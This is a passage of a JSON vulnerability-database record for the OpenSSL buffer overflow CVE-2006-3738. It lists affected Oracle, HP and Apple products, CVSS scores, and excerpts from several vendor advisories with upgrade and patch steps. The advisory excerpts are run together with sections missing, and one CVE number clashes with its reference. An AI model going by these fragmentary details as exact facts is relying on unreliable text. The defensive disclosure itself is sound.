            "model": "oracle10g enterprise edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "10.1.0.2"
          },
          {
            "model": "oracle10g application server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "10.1.3.4.0"
          },
          {
            "model": "oracle10g application server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "10.1.3.0.0"
          },
          {
            "model": "oracle10g application server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "10.1.2.2.0"
          },
          {
            "model": "oracle10g application server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "10.1.2.1.0"
          },
          {
            "model": "oracle10g application server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "10.1.2.0.2"
          },
          {
            "model": "oracle10g application server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "10.1.2.0.1"
          },
          {
            "model": "oracle10g application server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "10.1.2"
          },
          {
            "model": "oracle10g application server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "9.0.4.2"
          },
          {
            "model": "oracle10g application server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "9.0.4.1"
          },
          {
            "model": "identity management 10g",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "10.1.4.0.1"
          },
          {
            "model": "9i application server release",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "11.0.2.2"
          },
          {
            "model": "enterprise manager grid control 10g",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "10.2.1"
          },
          {
            "model": "enterprise manager grid control 10g",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "10.1.5"
          },
          {
            "model": "enterprise manager grid control 10g",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "10.1.4"
          },
          {
            "model": "enterprise manager grid control 10g",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "10.1.3"
          },
          {
            "model": "e-business suite 11i cu2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "11.5.10"
          },
          {
            "model": "e-business suite 11i",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "11.5.10"
          },
          {
            "model": "e-business suite 11i",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "11.5.9"
          },
          {
            "model": "e-business suite 11i",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "11.5.8"
          },
          {
            "model": "e-business suite 11i",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "11.5.7"
          },
          {
            "model": "e-business suite",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "11.0"
          },
          {
            "model": "developer suite",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "10.1.2.0.2"
          },
          {
            "model": "developer suite",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "9.0.4.3"
          },
          {
            "model": "developer suite 6i",
            "scope": null,
            "trust": 0.3,
            "vendor": "oracle",
            "version": null
          },
          {
            "model": "application server release",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "210.1.2.0.2"
          },
          {
            "model": "application server release",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "210.1.2.0.1"
          },
          {
            "model": "application server release",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "210.1.2.0.0"
          },
          {
            "model": "application server release",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "29.0.2.3"
          },
          {
            "model": "application server 10g",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "9.0.4.3"
          },
          {
            "model": "application server 10g",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "9.0.4.2"
          },
          {
            "model": "application server 10g",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "9.0.4.1"
          },
          {
            "model": "application server 10g",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "9.0.4"
          },
          {
            "model": "oracle for openview for linux ltu",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "0"
          },
          {
            "model": "oracle for openview",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "9.1.1"
          },
          {
            "model": "oracle for openview",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "8.1.7"
          },
          {
            "model": "oracle for openview",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "9.2"
          },
          {
            "model": "mac os server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "x10.4.11"
          },
          {
            "model": "mac os server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "x10.4.10"
          },
          {
            "model": "mac os",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "x10.4.11"
          },
          {
            "model": "mac os",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "x10.4.10"
          }
        ],
        "sources": [
          {
            "db": "CERT/CC",
            "id": "VU#386964"
          },
          {
            "db": "CERT/CC",
            "id": "VU#845620"
          },
          {
            "db": "CERT/CC",
            "id": "VU#547300"
          },
          {
            "db": "BID",
            "id": "20249"
          },
          {
            "db": "BID",
            "id": "22083"
          },
          {
            "db": "NVD",
            "id": "CVE-2006-3738"
          }
        ]
      },
      "credits": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/credits#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "The vendor credits Tavis Ormandy and Will Drewry of the Google Security Team with the discovery of this vulnerability.",
        "sources": [
          {
            "db": "BID",
            "id": "20249"
          }
        ],
        "trust": 0.3
      },
      "cve": "CVE-2006-3738",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "COMPLETE",
                "baseScore": 10.0,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 10.0,
                "id": "CVE-2006-3738",
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "severity": "HIGH",
                "trust": 1.0,
                "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
                "version": "2.0"
              }
            ],
            "cvssV3": [],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2006-3738",
                "trust": 1.0,
                "value": "HIGH"
              },
              {
                "author": "CARNEGIE MELLON",
                "id": "VU#386964",
                "trust": 0.8,
                "value": "0.32"
              },
              {
                "author": "CARNEGIE MELLON",
                "id": "VU#845620",
                "trust": 0.8,
                "value": "7.56"
              },
              {
                "author": "CARNEGIE MELLON",
                "id": "VU#547300",
                "trust": 0.8,
                "value": "2.53"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "CERT/CC",
            "id": "VU#386964"
          },
          {
            "db": "CERT/CC",
            "id": "VU#845620"
          },
          {
            "db": "CERT/CC",
            "id": "VU#547300"
          },
          {
            "db": "NVD",
            "id": "CVE-2006-3738"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Buffer overflow in the SSL_get_shared_ciphers function in OpenSSL 0.9.7 before 0.9.7l, 0.9.8 before 0.9.8d, and earlier versions has unspecified impact and remote attack vectors involving a long list of ciphers. A flaw in the OpenSSL library could allow a remote attacker to cause a denial of service on an affected application. Multiple RSA implementations fail to properly handle RSA signatures. This vulnerability may allow an attacker to forge RSA signatures. \nSuccessfully exploiting this issue may result in the execution of arbitrary machine code in the context of applications that use the affected library. Failed exploit attempts may crash applications, denying service to legitimate users. Oracle has released a Critical Patch Update advisory for January 2007 to address these vulnerabilities for supported releases. Earlier unsupported releases are likely to be affected by these issues as well. \nThe issues identified by the vendor affect all security properties of the Oracle products and present local and remote threats. Various levels of authorization are needed to leverage some of the issues, but other issues do not require any authorization. The most severe of the vulnerabilities could possibly expose affected computers to complete compromise. OpenSSL Security Advisory [28th September 2006]\n\nNew OpenSSL releases are now available to correct four security\nissues. \n\n\nASN.1 Denial of Service Attacks (CVE-2006-2937, CVE-2006-2940)\n==============================================================\n\nVulnerability\n-------------\n\nDr. S. N. Henson recently developed an ASN.1 test suite for NISCC\n(www.niscc.gov.uk). During the parsing of certain invalid ASN.1 structures an error\ncondition is mishandled.  This can result in an infinite loop which\nconsumes system memory (CVE-2006-2937).  (This issue did not affect\nOpenSSL versions prior to 0.9.7)\n\n2. Certain types of public key can take disproportionate amounts of\ntime to process. This could be used by an attacker in a denial of\nservice attack (CVE-2006-2940). \n\nAny code which uses OpenSSL to parse ASN.1 data from untrusted sources\nis affected. This includes SSL servers which enable client\nauthentication and S/MIME applications. \n\nAcknowledgements\n----------------\n\nThe OpenSSL team thank Dr S. N. Henson of Open Network Security and NISCC\nfor funding the ASN.1 test suite project.  An attacker could send a list of ciphers to an\napplication that uses this function and overrun a buffer\n(CVE-2006-3738). \n\nAcknowledgements\n----------------\n\nThe OpenSSL team thank Tavis Ormandy and Will Drewry of the Google\nSecurity Team for reporting this issue. \n\n\nSSLv2 Client Crash (CVE-2006-4343)\n==================================\n\nVulnerability\n-------------\n\nA flaw in the SSLv2 client code was discovered. \n\nAcknowledgements\n----------------\n\nThe OpenSSL team thank Tavis Ormandy and Will Drewry of the Google\nSecurity Team for reporting this issue. \n\n\nRecommendations\n===============\n\nThese vulnerabilities are resolved in the following versions of OpenSSL:\n\n   - in the 0.9.7 branch, version 0.9.7l (or later);\n   - in the 0.9.8 branch, version 0.9.8d (or later). \n\nOpenSSL 0.9.8d and OpenSSL 0.9.7l are available for download via\nHTTP and FTP from the following master locations (you can find the\nvarious FTP mirrors under https://www.openssl.org/source/mirror.html):\n\n    o https://www.openssl.org/source/\n    o ftp://ftp.openssl.org/source/\n\nThe distribution file names are:\n\n    o openssl-0.9.8d.tar.gz\n      MD5 checksum: 8ed1853538e1d05a1f5ada61ebf8bffa\n      SHA1 checksum: 4136fba00303a3d319d2052bfa8e1f09a2e12fc2\n\n    o openssl-0.9.7l.tar.gz\n      MD5 checksum: b21d6e10817ddeccf5fbe1379987333e\n      SHA1 checksum: f0e4136639b10cbd1227c4f7350ff7ad406e575d\n    \nThe checksums were calculated using the following commands:\n\n    openssl md5 openssl-0.9*.tar.gz\n    openssl sha1 openssl-0.9*.tar.gz\n\nAfter upgrading make sure to recompile any applications statically\nlinked to OpenSSL libraries and restart all applications that use\nOpenSSL. \n\n\nReferences\n==========\n\nURL for this Security Advisory:\nhttps://www.openssl.org/news/secadv_20060928.txt\n. \n\nAffected packages\n=================\n\n    -------------------------------------------------------------------\n     Package           /   Vulnerable   /                   Unaffected\n    -------------------------------------------------------------------\n  1  dev-libs/openssl      \u003c 0.9.8e-r3                    \u003e= 0.9.8e-r3\n\nDescription\n===========\n\nMoritz Jodeit reported an off-by-one error in the\nSSL_get_shared_ciphers() function, resulting from an incomplete fix of\nCVE-2006-3738. A flaw has also been reported in the\nBN_from_montgomery() function in crypto/bn/bn_mont.c when performing\nMontgomery multiplication. A local attacker could\nperform a side channel attack to retrieve the RSA private keys. \n\nResolution\n==========\n\nAll OpenSSL users should upgrade to the latest version:\n\n    # emerge --sync\n    # emerge --ask --oneshot --verbose \"\u003e=dev-libs/openssl-0.9.8e-r3\"\n\nReferences\n==========\n\n  [ 1 ] CVE-2006-3738\n        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3738\n  [ 2 ] CVE-2007-3108\n        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3108\n  [ 3 ] CVE-2007-5135\n        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5135\n\nAvailability\n============\n\nThis GLSA and any updates to it are available for viewing at\nthe Gentoo Security Website:\n\n  http://security.gentoo.org/glsa/glsa-200710-06.xml\n\nConcerns?\n=========\n\nSecurity is a primary focus of Gentoo Linux and ensuring the\nconfidentiality and security of our users machines is of utmost\nimportance to us. Any security concerns should be addressed to\nsecurity@gentoo.org or alternatively, you may file a bug at\nhttp://bugs.gentoo.org. \n\nLicense\n=======\n\nCopyright 2007 Gentoo Foundation, Inc; referenced text\nbelongs to its owner(s). \n\nThe contents of this document are licensed under the\nCreative Commons - Attribution / Share Alike license. rPath Security Advisory: 2006-0175-1\nPublished: 2006-09-28\nProducts: rPath Linux 1\nRating: Major\nExposure Level Classification:\n    Remote Deterministic Unauthorized Access\nUpdated Versions:\n    openssl=/conary.rpath.com@rpl:devel//1/0.9.7f-10.4-1\n    openssl-scripts=/conary.rpath.com@rpl:devel//1/0.9.7f-10.4-1\n\nReferences:\n    http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2937\n    http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2940\n    http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3738\n    http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4343\n    http://issues.rpath.com/browse/RPL-613\n\nDescription:\n    Previous versions of the openssl package are vulnerable to multiple\n    attacks. \n    In particular, any connection that the mysql daemon will accept\n    may be vulnerable.  In the default configuration of mysql, that\n    would be a local unauthorized access vulnerability, but mysql can\n    be configured to listen for network connections from remote hosts,\n    which would then enable remote unauthorized access.  Any program\n    that calls the SSL_get_shared_ciphers() function may be vulnerable. \n\n_______________________________________________\nFull-Disclosure - We believe in it. \nCharter: http://lists.grok.org.uk/full-disclosure-charter.html\nHosted and sponsored by Secunia - http://secunia.com/\n. \nCorrected:      2007-10-03 21:39:43 UTC (RELENG_6, 6.2-STABLE)\n                2007-10-03 21:40:35 UTC (RELENG_6_2, 6.2-RELEASE-p8)\n                2007-10-03 21:41:22 UTC (RELENG_6_1, 6.1-RELEASE-p20)\n                2007-10-03 21:42:00 UTC (RELENG_5, 5.5-STABLE)\n                2007-10-03 21:42:32 UTC (RELENG_5_5, 5.5-RELEASE-p16)\nCVE Name:       CVE-2007-5135\n\nFor general information regarding FreeBSD Security Advisories,\nincluding descriptions of the fields above, security branches, and the\nfollowing sections, please visit \u003cURL:http://security.FreeBSD.org/\u003e.   Background\n\nFreeBSD includes software from the OpenSSL Project.  The OpenSSL Project is\na collaborative effort to develop a robust, commercial-grade, full-featured,\nand Open Source toolkit implementing the Secure Sockets Layer (SSL v2/v3)\nand Transport Layer Security (TLS v1) protocols as well as a full-strength\ngeneral purpose cryptography library. \n\nII.  Problem Description\n\nA buffer overflow addressed in FreeBSD-SA-06:23.openssl has been found\nto be incorrectly fixed. \n\nIII. \n\nIV.  Workaround\n\nNo workaround is available, but only applications using the\nSSL_get_shared_ciphers() function are affected.   Solution\n\nPerform one of the following:\n\n1) Upgrade your vulnerable system to 5-STABLE, or 6-STABLE, or to the\nRELENG_6_2, RELENG_6_1, or RELENG_5_5 security branch dated after the\ncorrection date. \n\n2) To patch your present system:\n\nThe following patch have been verified to apply to FreeBSD 5.5, 6.1,\nand 6.2 systems. \n\na) Download the relevant patch from the location below, and verify the\ndetached PGP signature using your PGP utility. \n\n# fetch http://security.FreeBSD.org/patches/SA-07:08/openssl.patch\n# fetch http://security.FreeBSD.org/patches/SA-07:08/openssl.patch.asc\n\nb) Execute the following commands as root:\n\n# cd /usr/src\n# patch \u003c /path/to/patch\n# cd /usr/src/secure/lib/libssl\n# make obj \u0026\u0026 make depend \u0026\u0026 make \u0026\u0026 make install\n\nVI.  Correction details\n\nThe following list contains the revision numbers of each file that was\ncorrected in FreeBSD. \n\nBranch                                                           Revision\n  Path\n- -------------------------------------------------------------------------\nRELENG_5\n  src/crypto/openssl/ssl/ssl_lib.c                           1.1.1.11.2.3\nRELENG_5_5\n  src/UPDATING                                            1.342.2.35.2.16\n  src/sys/conf/newvers.sh                                  1.62.2.21.2.18\n  src/crypto/openssl/ssl/ssl_lib.c                       1.1.1.11.2.1.4.2\nRELENG_6\n  src/crypto/openssl/ssl/ssl_lib.c                           1.1.1.12.2.2\nRELENG_6_2\n  src/UPDATING                                            1.416.2.29.2.11\n  src/sys/conf/newvers.sh                                  1.69.2.13.2.11\n  src/crypto/openssl/ssl/ssl_lib.c                       1.1.1.12.2.1.2.1\nRELENG_6_1\n  src/UPDATING                                            1.416.2.22.2.22\n  src/sys/conf/newvers.sh                                  1.69.2.11.2.22\n  src/crypto/openssl/ssl/ssl_lib.c                           1.1.1.12.6.2\n- -------------------------------------------------------------------------\n\nVII. The Common Vulnerabilities and Exposures\n     (CVE) project assigned the id CVE-2006-2937 [2] to the problem. \n\n  2. The Common Vulnerabilities and Exposures (CVE)\n     project assigned the id CVE-2006-2940 [3] to the problem. \n\n  3. The\n     Common Vulnerabilities and Exposures (CVE) project assigned the id\n     CVE-2006-3780 [4] to the problem. \n\n  4. The\n     Common Vulnerabilities and Exposures (CVE) project assigned the id\n     CVE-2006-4343 [5] to the problem. \n________________________________________________________________________\n\nReferences:\n  [0] http://www.openssl.org/news/secadv_20060928.txt \n  [1] http://www.openssl.org/\n  [2] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2937\n  [3] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2940\n  [4] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3738\n  [5] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4343\n________________________________________________________________________\n\nFor security reasons, this advisory was digitally signed with the\nOpenPGP public key \"OpenPKG \u003copenpkg@openpkg.org\u003e\" (ID 63C4CB9F) of the\nOpenPKG project which you can retrieve from http://pgp.openpkg.org and\nhkp://pgp.openpkg.org. Follow the instructions on http://pgp.openpkg.org\nfor details on how to verify the integrity of this advisory. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\nSUPPORT COMMUNICATION - SECURITY BULLETIN\n\nDocument ID: c00849540\nVersion: 1\n\nHPSBUX02186 SSRT071299 rev.1 - HP-UX running Apache Remote Execution of Arbitrary Code, Denial of Service (DoS), Unauthorized Access\n\nNOTICE: The information in this Security Bulletin should be acted upon as soon as possible. \n\nRelease Date: 2007-01-17\nLast Updated: 2007-01-23\n\nPotential Security Impact: Remote execution of arbitrary code, Denial of Service (DoS), and unauthorized access. \n\nSource: Hewlett-Packard Company, HP Software Security Response Team\n\nVULNERABILITY SUMMARY\nPotential security vulnerabilities have been identified with Apache running on HP-UX. These vulnerabilities could be exploited remotely to allow execution of arbitrary code, Denial of Service (DoS), or unauthorized access. \n\nReferences: CVE-2006-2940, CVE-2006-2937, CVE-2006-3738, CVE-2006-4343, CVE-2006-4339, CVE-2005-2969. \n\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. \nHP-UX B.11.11, B.11.23, and B.11.31 running Apache-based Web Server prior to v.2.0.58.01\n\nBACKGROUND\n\nAFFECTED VERSIONS\n\nFor IPv4:\nHP-UX B.11.00\nHP-UX B.11.11\n===========\nhpuxwsAPACHE\naction: install revision A.2.0.58.01 or subsequent\nrestart Apache\nURL:http://h20293.www2.hp.com/cgi-bin/swdepot_parser.cgi/cgi/displayProductInfo.pl?productNumber=HPUXWSSUITE\n\nFor IPv6:\nHP-UX B.11.11\n===========\nhpuxwsAPACHE,revision=B.1.0.00.01\nhpuxwsAPACHE,revision=B.1.0.07.01\nhpuxwsAPACHE,revision=B.1.0.08.01\nhpuxwsAPACHE,revision=B.1.0.09.01\nhpuxwsAPACHE,revision=B.1.0.10.01\nhpuxwsAPACHE,revision=B.2.0.48.00\nhpuxwsAPACHE,revision=B.2.0.49.00\nhpuxwsAPACHE,revision=B.2.0.50.00\nhpuxwsAPACHE,revision=B.2.0.51.00\nhpuxwsAPACHE,revision=B.2.0.52.00\nhpuxwsAPACHE,revision=B.2.0.53.00\nhpuxwsAPACHE,revision=B.2.0.54.00\nhpuxwsAPACHE,revision=B.2.0.55.00\nhpuxwsAPACHE,revision=B.2.0.56.00\nhpuxwsAPACHE,revision=B.2.0.58.00\naction: install revision B.2.0.58.01 or subsequent\nrestart Apache\nURL:http://h20293.www2.hp.com/cgi-bin/swdepot_parser.cgi/cgi/displayProductInfo.pl?productNumber=HPUXWSSUITE\n\nHP-UX B.11.23\n===========\nhpuxwsAPACHE\naction: install revision B.2.0.58.01 or subsequent\nrestart Apache\nURL:http://h20293.www2.hp.com/cgi-bin/swdepot_parser.cgi/cgi/displayProductInfo.pl?productNumber=HPUXWSSUITE\n\nEND AFFECTED VERSIONS\n\nRESOLUTION\n\nHP has made the following software updates available to resolve the issue. \nSoftware updates for the Apache-based Web Server are available from:\nhttp://h20293.www2.hp.com/cgi-bin/swdepot_parser.cgi/cgi/displayProductInfo.pl?productNumber=HPUXWSSUITE\n\nHP-UX B.11.00, B.11.11 and HP-UX B.11.23 require the Apache-based Web Server v.2.0.58.01 or subsequent. \n\nApache Update Procedure\n\nCheck for Apache Installation\n -----------------------------\nTo determine if the Apache web server from HP is installed on your system, use Software Distributor\u0027s swlist command. All three revisions of the product may co-exist on a single system. \nFor example, the results of the command swlist -l product | grep -I apache\nhpuxwsAPACHE B.2.0.55.00 HP-UX Apache-based Web Server\n\nStop Apache\n -------------\nBefore updating, make sure the previous Apache binary is stopped. If Apache is not stopped, the installation would be successful but the new version would be prevented from starting until a later time. \nAfter determining which Apache is installed, stop Apache with the following commands:\nfor hpuxwsAPACHE: /opt/hpws/apache[32]/bin/apachectl stop\n\nDownload and Install Apache\n --------------------------\nDownload Apache from Software Depot. http://h20293.www2.hp.com/cgi-bin/swdepot_parser.cgi/cgi/displayProductInfo.pl?productNumber=HPUXWSSUITE\nVerify successful download by comparing the cksum with the value specified on the installation web page. \nUse SD to swinstall the depot. Installation of this new revision of HP Apache over an existing HP Apache installation is supported, while installation over a non-HP Apache is NOT supported. \n\nRemoving Apache Installation\n ---------------------------\nThe potential vulnerability can also be resolved by removing Apache rather than installing a newer revision. To remove Apache use both Software Distributor\u0027s \"swremove\" command and also \"rm -rf\" the home location as specified in the rc.config.d file \"HOME\" variables. \n%ls /etc/rc.config.d | \\ grep apache hpapache2conf hpws_apache[32]conf\n\nMANUAL ACTIONS: Yes - Update plus other actions\nInstall the revision of the product. \n\nPRODUCT SPECIFIC INFORMATION\nHP-UX Security Patch Check: Security Patch Check revision B.02.00 analyzes all HP-issued Security Bulletins to provide a subset of recommended actions that potentially affect a specific HP-UX system. \nFor more information: http://software.hp.com/portal/swdepot/displayProductInfo.do?productNumber=B6834AA\n\nHISTORY: rev.1 - 23 January 2007 Initial Release\n\nThird Party Security Patches: Third party security patches which are to be installed on systems running HP software products should be applied in accordance with the customer\u0027s patch management policy. \n\nSupport: For further information, contact normal HP Services support channel. \n\nReport: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com\nIt is strongly recommended that security related information being communicated to HP be encrypted using PGP, especially exploit information. \nTo get the security-alert PGP key, please send an e-mail message as follows:\n  To: security-alert@hp.com\n  Subject: get key\n\nSubscribe: To initiate a subscription to receive future HP Security Bulletins via Email:\nhttp://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NA\u0026langcode=USENG\u0026jumpid=in_SC-GEN__driverITRC\u0026topiccode=ITRC\nOn the web page: ITRC security bulletins and patch sign-up\nUnder Step1: your ITRC security bulletins and patches\n  - check ALL categories for which alerts are required and continue. \nUnder Step2: your ITRC operating systems\n  - verify your operating system selections are checked and save. \n\nTo update an existing subscription: http://h30046.www3.hp.com/subSignIn.php\nLog in on the web page: Subscriber\u0027s choice for Business: sign-in. \nOn the web page: Subscriber\u0027s Choice: your profile summary - use Edit Profile to update appropriate sections. \n\nTo review previously published Security Bulletins visit: http://www.itrc.hp.com/service/cki/secBullArchive.do\n\n* The Software Product Category that this Security Bulletin relates to is represented by the 5th and 6th characters of the Bulletin number in the title:\n\nGN = HP General SW\nMA = HP Management Agents\nMI = Misc. 3rd Party SW\nMP = HP MPE/iX\nNS = HP NonStop Servers\nOV = HP OpenVMS\nPI = HP Printing \u0026 Imaging\nST = HP Storage SW\nTL = HP Trusted Linux\nTU = HP Tru64 UNIX\nUX = HP-UX\nVV = HP VirtualVault\n\nSystem management and security procedures must be reviewed frequently to maintain system integrity. HP is continually reviewing and enhancing the security features of software products to provide customers with current secure solutions. \n\n\"HP is broadly distributing this Security Bulletin in order to bring to the attention of users of the affected HP products the important security information contained in this Bulletin. HP recommends that all users determine the applicability of this information to their individual situations and take appropriate action. HP does not warrant that this information is necessarily accurate or complete for all user situations and, consequently, HP will not be responsible for any damages resulting from user\u0027s use or disregard of the information provided in this Bulletin. To the extent permitted by law, HP disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose, title and non-infringement.\"\n\n\\xa9Copyright 2007 Hewlett-Packard Development Company, L.P. \n\nHewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided \"as is\" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental, special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners. \n\n-----BEGIN PGP SIGNATURE-----\nVersion: PGP 8.1\n\niQA/AwUBRbc7fOAfOvwtKn1ZEQJs6ACg9AMS2ZtEgsaZh7T9e8Q0OgyfmEQAni1I\notH/juFiPayhwdxQwX1pZwdm\n=e4BA\n-----END PGP SIGNATURE-----\n. \nHP System Management Homepage (SMH) versions prior to 2.1.7 running on Linux and Windows. \n\nBACKGROUND\n\n\nRESOLUTION\nHP has provided System Management Homepage (SMH) version 2.1.7 or subsequent for each platform to resolve this issue",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2006-3738"
          },
          {
            "db": "CERT/CC",
            "id": "VU#386964"
          },
          {
            "db": "CERT/CC",
            "id": "VU#845620"
          },
          {
            "db": "CERT/CC",
            "id": "VU#547300"
          },
          {
            "db": "BID",
            "id": "20249"
          },
          {
            "db": "BID",
            "id": "22083"
          },
          {
            "db": "PACKETSTORM",
            "id": "169663"
          },
          {
            "db": "PACKETSTORM",
            "id": "59899"
          },
          {
            "db": "PACKETSTORM",
            "id": "50535"
          },
          {
            "db": "PACKETSTORM",
            "id": "59797"
          },
          {
            "db": "PACKETSTORM",
            "id": "50560"
          },
          {
            "db": "PACKETSTORM",
            "id": "53990"
          },
          {
            "db": "PACKETSTORM",
            "id": "58346"
          }
        ],
        "trust": 4.23
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "BID",
            "id": "22083",
            "trust": 3.7
          },
          {
            "db": "SECUNIA",
            "id": "23280",
            "trust": 2.6
          },
          {
            "db": "SECUNIA",
            "id": "23309",
            "trust": 2.6
          },
          {
            "db": "NVD",
            "id": "CVE-2006-3738",
            "trust": 2.3
          },
          {
            "db": "BID",
            "id": "20249",
            "trust": 2.1
          },
          {
            "db": "CERT/CC",
            "id": "VU#547300",
            "trust": 2.1
          },
          {
            "db": "SECUNIA",
            "id": "22207",
            "trust": 1.8
          },
          {
            "db": "SECUNIA",
            "id": "22212",
            "trust": 1.8
          },
          {
            "db": "SECUNIA",
            "id": "22116",
            "trust": 1.8
          },
          {
            "db": "SECUNIA",
            "id": "22216",
            "trust": 1.8
          },
          {
            "db": "SECUNIA",
            "id": "22220",
            "trust": 1.8
          },
          {
            "db": "SECUNIA",
            "id": "22330",
            "trust": 1.8
          },
          {
            "db": "SECUNIA",
            "id": "22130",
            "trust": 1.8
          },
          {
            "db": "SECUNIA",
            "id": "22240",
            "trust": 1.8
          },
          {
            "db": "SECUNIA",
            "id": "22259",
            "trust": 1.8
          },
          {
            "db": "SECUNIA",
            "id": "22260",
            "trust": 1.8
          },
          {
            "db": "SECUNIA",
            "id": "22165",
            "trust": 1.8
          },
          {
            "db": "SECUNIA",
            "id": "22166",
            "trust": 1.8
          },
          {
            "db": "SECUNIA",
            "id": "22172",
            "trust": 1.8
          },
          {
            "db": "SECUNIA",
            "id": "22284",
            "trust": 1.8
          },
          {
            "db": "SECUNIA",
            "id": "22186",
            "trust": 1.8
          },
          {
            "db": "SECUNIA",
            "id": "22193",
            "trust": 1.8
          },
          {
